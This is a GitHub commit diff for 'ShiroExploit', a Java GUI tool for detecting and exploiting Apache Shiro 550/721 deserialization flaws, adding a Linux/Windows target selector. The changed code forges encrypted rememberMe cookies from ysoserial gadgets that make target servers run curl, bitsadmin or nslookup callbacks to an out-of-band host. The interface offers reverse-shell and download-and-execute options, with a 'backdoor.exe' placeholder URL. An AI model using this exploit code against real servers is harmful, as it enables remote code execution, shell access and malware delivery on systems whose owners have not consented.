Skip to content

Commit

Permalink
1.增加手动选择Linux/Windows的选项,加快检测效率
Browse files Browse the repository at this point in the history 
2.略微修改开始界面的 UI 和尺寸
  • Loading branch information
feihong committed May 17, 2020
1 parent 5ca546c commit bc099f3
Show file tree
Hide file tree
Showing 9 changed files with 164 additions and 165 deletions.
75 changes: 40 additions & 35 deletions src/main/java/com/shiroexploit/gui/MainPane.java
View file
Original file line number Diff line number Diff line change
@@ -1,5 +1,6 @@
package com.shiroexploit.gui;

import com.shiroexploit.util.Config;
import com.shiroexploit.util.ExploitFailedException;
import com.shiroexploit.vulnverifier.Verifier;
import com.shiroexploit.vulnverifier.VerifierFactory;
Expand All @@ -26,8 +27,8 @@ public class MainPane {
private Button execute = new Button();
private Button downloadAndExecute = new Button();
private Button getReverseShell = new Button();
private CheckBox useLinuxReverseShell = new CheckBox("反弹Shell(Linux)");
private CheckBox useWindowsReverseShell = new CheckBox("反弹Shell(Windows)");
private CheckBox useLinuxReverseShell = new CheckBox("反弹Shell");
private CheckBox useWindowsReverseShell = new CheckBox("反弹Shell");
private BorderPane borderPane = new BorderPane();
private PrintStream printStream;
private Verifier verifier;
Expand Down Expand Up @@ -266,39 +267,43 @@ private void drawPane(){
gridPane.setHgap(10);
gridPane.setVgap(20);
gridPane.setPadding(new Insets(10,0,10,0));
useLinuxReverseShell.setSelected(false);
useLinuxReverseShell.setDisable(true);
GridPane.setColumnSpan(useLinuxReverseShell, 2);
gridPane.add(useLinuxReverseShell, 0,0);

ipText.setDisable(true);
ipText.setPromptText("IP地址");
GridPane.setColumnSpan(ipText, 3);
gridPane.add(ipText, 2,0);

portText.setDisable(true);
portText.setPromptText("端口");
gridPane.add(portText, 5,0);

getReverseShell.setText("执行");
getReverseShell.setDisable(true);
GridPane.setColumnSpan(getReverseShell, 2);
gridPane.add(getReverseShell, 6,0);

useWindowsReverseShell.setSelected(false);
useWindowsReverseShell.setDisable(true);
GridPane.setColumnSpan(useWindowsReverseShell, 2);
gridPane.add(useWindowsReverseShell, 0,1);

urlText.setDisable(true);
urlText.setPromptText("http://www.mydomain.com/backdoor.exe");
GridPane.setColumnSpan(urlText, 4);
gridPane.add(urlText, 2,1);

downloadAndExecute.setText("下载并执行");
downloadAndExecute.setDisable(true);
GridPane.setColumnSpan(downloadAndExecute, 2);
gridPane.add(downloadAndExecute, 6,1);

if(Config.getInstance().getPlatform() == 0){
useLinuxReverseShell.setSelected(false);
useLinuxReverseShell.setDisable(true);
GridPane.setColumnSpan(useLinuxReverseShell, 2);
gridPane.add(useLinuxReverseShell, 0,0);

ipText.setDisable(true);
ipText.setPromptText("IP地址");
GridPane.setColumnSpan(ipText, 3);
gridPane.add(ipText, 2,0);

portText.setDisable(true);
portText.setPromptText("端口");
gridPane.add(portText, 5,0);

getReverseShell.setText("执行");
getReverseShell.setDisable(true);
GridPane.setColumnSpan(getReverseShell, 2);
gridPane.add(getReverseShell, 6,0);
}else{
useWindowsReverseShell.setSelected(false);
useWindowsReverseShell.setDisable(true);
GridPane.setColumnSpan(useWindowsReverseShell, 2);
gridPane.add(useWindowsReverseShell, 0,0);

urlText.setDisable(true);
urlText.setPromptText("http://www.mydomain.com/backdoor.exe");
urlText.setPrefWidth(400);
GridPane.setColumnSpan(urlText, 4);
gridPane.add(urlText, 2,0);

downloadAndExecute.setText("下载并执行");
downloadAndExecute.setDisable(true);
GridPane.setColumnSpan(downloadAndExecute, 2);
gridPane.add(downloadAndExecute, 6,0);
}


VBox vBox = new VBox();
Expand Down
51 changes: 31 additions & 20 deletions src/main/java/com/shiroexploit/gui/StartPane.java
View file
Original file line number Diff line number Diff line change
Expand Up @@ -2,7 +2,6 @@

import com.shiroexploit.task.TestConnectionTask;
import com.shiroexploit.util.Config;
import com.shiroexploit.util.HttpRequest;
import com.shiroexploit.util.HttpRequestInfo;
import javafx.application.Application;
import javafx.beans.value.ChangeListener;
Expand Down Expand Up @@ -37,7 +36,7 @@ public void start(Stage primaryStage) throws Exception {

Pane borderPane = new StartPane().getPane();
primaryStage.setTitle("Shiro550/721漏洞检测 by飞鸿");
primaryStage.setScene(new Scene(borderPane, 650, 500));
primaryStage.setScene(new Scene(borderPane, 800, 550));
primaryStage.show();

// //测试
Expand All @@ -52,9 +51,8 @@ public void start(Stage primaryStage) throws Exception {
private BorderPane simpleRequestSubpane = new BorderPane();
private BorderPane complexRequestSubpane = new BorderPane();
private ComboBox<String> comboBox = new ComboBox<>();
private ToggleGroup typeGroup = new ToggleGroup();
private RadioButton simpleHttpRequestButton = new RadioButton("简单Http请求");
private RadioButton complexHttpRequestButton = new RadioButton("复杂Http请求");
private ComboBox<String> platformCombox = new ComboBox<>();
private CheckBox complexHttpRequest = new CheckBox("复杂Http请求");
private TextField urlTextField = new TextField();
private TextArea cookieField = new TextArea();
private TextArea requestBodyField = new TextArea();
Expand Down Expand Up @@ -82,16 +80,23 @@ private void drawPane(){
comboBox.setPrefWidth(150);
comboBox.getSelectionModel().select(0);

simpleHttpRequestButton.setToggleGroup(typeGroup);
complexHttpRequestButton.setToggleGroup(typeGroup);
typeGroup.selectToggle(simpleHttpRequestButton);
Label label2 = new Label("目标操作系统");
List<String> data2 = new ArrayList<>();
data2.add("Linux");
data2.add("Windows");
platformCombox.setItems(FXCollections.observableArrayList(data2));
platformCombox.setPrefHeight(35);
platformCombox.setPrefWidth(150);
platformCombox.getSelectionModel().select(0);


GridPane gridPane = new GridPane();
gridPane.setPadding(new Insets(10,20,10,20));
gridPane.add(label, 0,0);
gridPane.add(comboBox,1,0);
gridPane.add(simpleHttpRequestButton,2,0);
gridPane.add(complexHttpRequestButton,3,0);
gridPane.add(label2,2,0);
gridPane.add(platformCombox, 3, 0);
gridPane.add(complexHttpRequest,4,0);
gridPane.setHgap(25);

urlTextField.setPrefHeight(35);
Expand Down Expand Up @@ -136,15 +141,18 @@ public void update(){

HttpRequestInfo requestInfo = Config.getInstance().getRequestInfo();
if(requestInfo.getHeaders().size() == 0){
typeGroup.selectToggle(simpleHttpRequestButton);
complexHttpRequest.setSelected(false);
urlTextField.setText(requestInfo.getRequestURL());
if(requestInfo.getRememberMeCookie() != null){
cookieField.setText(requestInfo.getRememberMeCookie());
}
}else{
typeGroup.selectToggle(complexHttpRequestButton);
complexHttpRequest.setSelected(true);
requestBodyField.setText(requestInfo.getOriginal());
}

int platform = Config.getInstance().getPlatform();
platformCombox.getSelectionModel().select(platform);
}

private void addListeners(){
Expand All @@ -161,24 +169,27 @@ public void changed(ObservableValue<? extends String> observable, String oldValu
}
});

typeGroup.selectedToggleProperty().addListener(new ChangeListener<Toggle>() {

complexHttpRequest.selectedProperty().addListener(new ChangeListener<Boolean>() {
@Override
public void changed(ObservableValue<? extends Toggle> observable, Toggle oldValue, Toggle newValue) {
if(newValue == simpleHttpRequestButton){
borderPane.setCenter(simpleRequestSubpane);
}else{
borderPane.setCenter(complexRequestSubpane);
}
public void changed(ObservableValue<? extends Boolean> observable, Boolean oldValue, Boolean newValue) {
if(newValue == true){
borderPane.setCenter(complexRequestSubpane);
}else{
borderPane.setCenter(simpleRequestSubpane);
}
}
});


next.setOnAction(new EventHandler<ActionEvent>() {
@Override
public void handle(ActionEvent event) {
config.setVulType(comboBox.getSelectionModel().getSelectedIndex());
config.setPlatform(platformCombox.getSelectionModel().getSelectedIndex());

Stage currentStage = (Stage)borderPane.getScene().getWindow();
if(typeGroup.getSelectedToggle() == simpleHttpRequestButton){
if(!complexHttpRequest.isSelected()){
String url = urlTextField.getText();
url = url != null ? url.trim() : null;
String cookie = cookieField.getText();
Expand Down
11 changes: 11 additions & 0 deletions src/main/java/com/shiroexploit/util/Config.java
View file
Original file line number Diff line number Diff line change
Expand Up @@ -8,6 +8,8 @@ public class Config {
// 0 for Shiro550, 1 for Shiro721
private int vulType = 0;
// 0 for ceye, 1 for self-implemented oob service
// 0 for linux, 1 for windows
private int platform = 0;
private int oobType = 0;
private boolean useJRMP = true;
private boolean skipIfFound = true;
Expand All @@ -20,6 +22,7 @@ public class Config {
private HttpRequestInfo requestInfo;
private String rememberMeCookieName;


public static Config getInstance(){
//懒汉式
if(config == null){
Expand Down Expand Up @@ -158,4 +161,12 @@ public void setJRMPServicePort(int JRMPServicePort) {
public int getDelay() {
return delay;
}

public int getPlatform() {
return platform;
}

public void setPlatform(int platform) {
this.platform = platform;
}
}
49 changes: 22 additions & 27 deletions src/main/java/com/shiroexploit/vulnverifier/Shiro550VerifierWithOutJRMP.java
View file
Original file line number Diff line number Diff line change
Expand Up @@ -50,34 +50,29 @@ private void sendAllCurlPayloadsWithAllKeys() throws ExploitFailedException {

System.out.println("[*] Trying Gadget: " + payloadType.getName());

//linux
for(String key : config.getKeys()){
String uuid = UUID.randomUUID().toString().replaceAll("-", "");
String command = "java -jar " + System.getProperty("user.dir") + File.separator + "ysoserial.jar " + payloadType.getName() + " \"curl http://" + config.getOOBServerAddress() + ":" + config.getHTTPServicePort() + "/gadget?uuid=" + uuid + "&type=" + payloadType.getName() + "\"";
byte[] payload = Tools.exec(command);
String rememberMe = AesEncrypt.encrypt(key, payload);
HttpRequest.request(config.getRequestInfo(), rememberMe);
map.put(uuid, key + ":" + payloadType.getName());
}

if(findValidGadget(map)){
flag = true;
if(config.isSkipIfFound()){
break;
if(config.getPlatform() == 0){
//linux
for(String key : config.getKeys()){
String uuid = UUID.randomUUID().toString().replaceAll("-", "");
String command = "java -jar " + System.getProperty("user.dir") + File.separator + "ysoserial.jar " + payloadType.getName() + " \"curl http://" + config.getOOBServerAddress() + ":" + config.getHTTPServicePort() + "/gadget?uuid=" + uuid + "&type=" + payloadType.getName() + "\"";
byte[] payload = Tools.exec(command);
String rememberMe = AesEncrypt.encrypt(key, payload);
HttpRequest.request(config.getRequestInfo(), rememberMe);
map.put(uuid, key + ":" + payloadType.getName());
}
}else{
//windows
for(String key : config.getKeys()){
String uuid = UUID.randomUUID().toString().replaceAll("-", "");
String command = "bitsadmin /rawreturn /transfer getfile http://" + config.getOOBServerAddress() + ":" + config.getHTTPServicePort()
+ "/gadget?uuid=" + uuid + "%26type=" + payloadType.getName() + " C:\\windows\\temp\\download_834723.tmp";
command = "java -jar " + System.getProperty("user.dir") + File.separator + "ysoserial.jar " + payloadType.getName() + " \"" + command + "\"";

byte[] payload = Tools.exec(command);
String rememberMe = AesEncrypt.encrypt(key, payload);
HttpRequest.request(config.getRequestInfo(), rememberMe);
map.put(uuid, key + ":" + payloadType.getName());
}
}

//windows
for(String key : config.getKeys()){
String uuid = UUID.randomUUID().toString().replaceAll("-", "");
String command = "bitsadmin /rawreturn /transfer getfile http://" + config.getOOBServerAddress() + ":" + config.getHTTPServicePort()
+ "/gadget?uuid=" + uuid + "%26type=" + payloadType.getName() + " C:\\windows\\temp\\download_834723.tmp";
command = "java -jar " + System.getProperty("user.dir") + File.separator + "ysoserial.jar " + payloadType.getName() + " \"" + command + "\"";

byte[] payload = Tools.exec(command);
String rememberMe = AesEncrypt.encrypt(key, payload);
HttpRequest.request(config.getRequestInfo(), rememberMe);
map.put(uuid, key + ":" + payloadType.getName());
}

if(findValidGadget(map)){
Expand Down
20 changes: 10 additions & 10 deletions src/main/java/com/shiroexploit/vulnverifier/Shiro550VerifiertUsingCeye.java
View file
Original file line number Diff line number Diff line change
Expand Up @@ -61,21 +61,21 @@ private Map<String,PayloadType> sendAllCurlPayloads(){
for(PayloadType payloadType : PayloadType.values()){
System.out.println("[*] Trying Gadget: " + payloadType.getName());

//linux
String uuid = UUID.randomUUID().toString().replaceAll("-", "");
String command = "java -jar " + System.getProperty("user.dir") + File.separator + "ysoserial.jar " + payloadType.getName() + " \"curl http://" + uuid + "." + config.getCeyeDomain() + "\"";
String command;
if(config.getPlatform() == 0){
//linux
command = "java -jar " + System.getProperty("user.dir") + File.separator + "ysoserial.jar " + payloadType.getName() + " \"curl http://" + uuid + "." + config.getCeyeDomain() + "\"";

}else{
//windows
command = "java -jar " + System.getProperty("user.dir") + File.separator + "ysoserial.jar " + payloadType.getName() + " \"nslookup " + uuid + "." + config.getCeyeDomain() + "\"";
}

byte[] payload = Tools.exec(command);
String rememberMe = AesEncrypt.encrypt(this.key, payload);
HttpRequest.request(config.getRequestInfo(), rememberMe);
map.put(uuid,payloadType);

//windows
uuid = UUID.randomUUID().toString().replaceAll("-", "");
command = "java -jar " + System.getProperty("user.dir") + File.separator + "ysoserial.jar " + payloadType.getName() + " \"nslookup " + uuid + "." + config.getCeyeDomain() + "\"";
payload = Tools.exec(command);
rememberMe = AesEncrypt.encrypt(this.key, payload);
HttpRequest.request(config.getRequestInfo(), rememberMe);
map.put(uuid,payloadType);
}

return map;
Expand Down
37 changes: 17 additions & 20 deletions src/main/java/com/shiroexploit/vulnverifier/Shiro550VerifiertWithJRMP.java
View file
Original file line number Diff line number Diff line change
Expand Up @@ -46,36 +46,33 @@ private void sendAllCurlPayloadsWithAllKeys() throws ExploitFailedException {

System.out.println("[*] Trying Gadget: " + payloadType.getName());

//linux
for(String key : config.getKeys()) {
String uuid = UUID.randomUUID().toString().replaceAll("-", "");
String command = "curl http://" + config.getOOBServerAddress() + ":" + config.getHTTPServicePort() + "/gadget?uuid=" + uuid + "%26type=" + payloadType.getName();
process(payloadType, command, key);
map.put(uuid, key + ":" + payloadType.getName());
}

if(findValidGadget(map)){
flag = true;
if(config.isSkipIfFound()){
break;
if(config.getPlatform() == 0){
//linux
for(String key : config.getKeys()) {
String uuid = UUID.randomUUID().toString().replaceAll("-", "");
String command = "curl http://" + config.getOOBServerAddress() + ":" + config.getHTTPServicePort() + "/gadget?uuid=" + uuid + "%26type=" + payloadType.getName();
process(payloadType, command, key);
map.put(uuid, key + ":" + payloadType.getName());
}
}else{
//windows
for(String key : config.getKeys()) {
String uuid = UUID.randomUUID().toString().replaceAll("-", "");
String command = "bitsadmin /rawreturn /transfer getfile http://" + config.getOOBServerAddress() + ":" + config.getHTTPServicePort()
+ "/gadget?uuid=" + uuid + "%26type=" + payloadType.getName() + " C:\\windows\\temp\\download_834723.tmp";
process(payloadType, command, key);
map.put(uuid, key + ":" + payloadType.getName());
}
}

//windows
for(String key : config.getKeys()) {
String uuid = UUID.randomUUID().toString().replaceAll("-", "");
String command = "bitsadmin /rawreturn /transfer getfile http://" + config.getOOBServerAddress() + ":" + config.getHTTPServicePort()
+ "/gadget?uuid=" + uuid + "%26type=" + payloadType.getName() + " C:\\windows\\temp\\download_834723.tmp";
process(payloadType, command, key);
map.put(uuid, key + ":" + payloadType.getName());
}

if(findValidGadget(map)){
flag = true;
if(config.isSkipIfFound()){
break;
}
}

}

if(!flag){
Expand Down
Loading

0 comments on commit bc099f3

Please sign in to comment.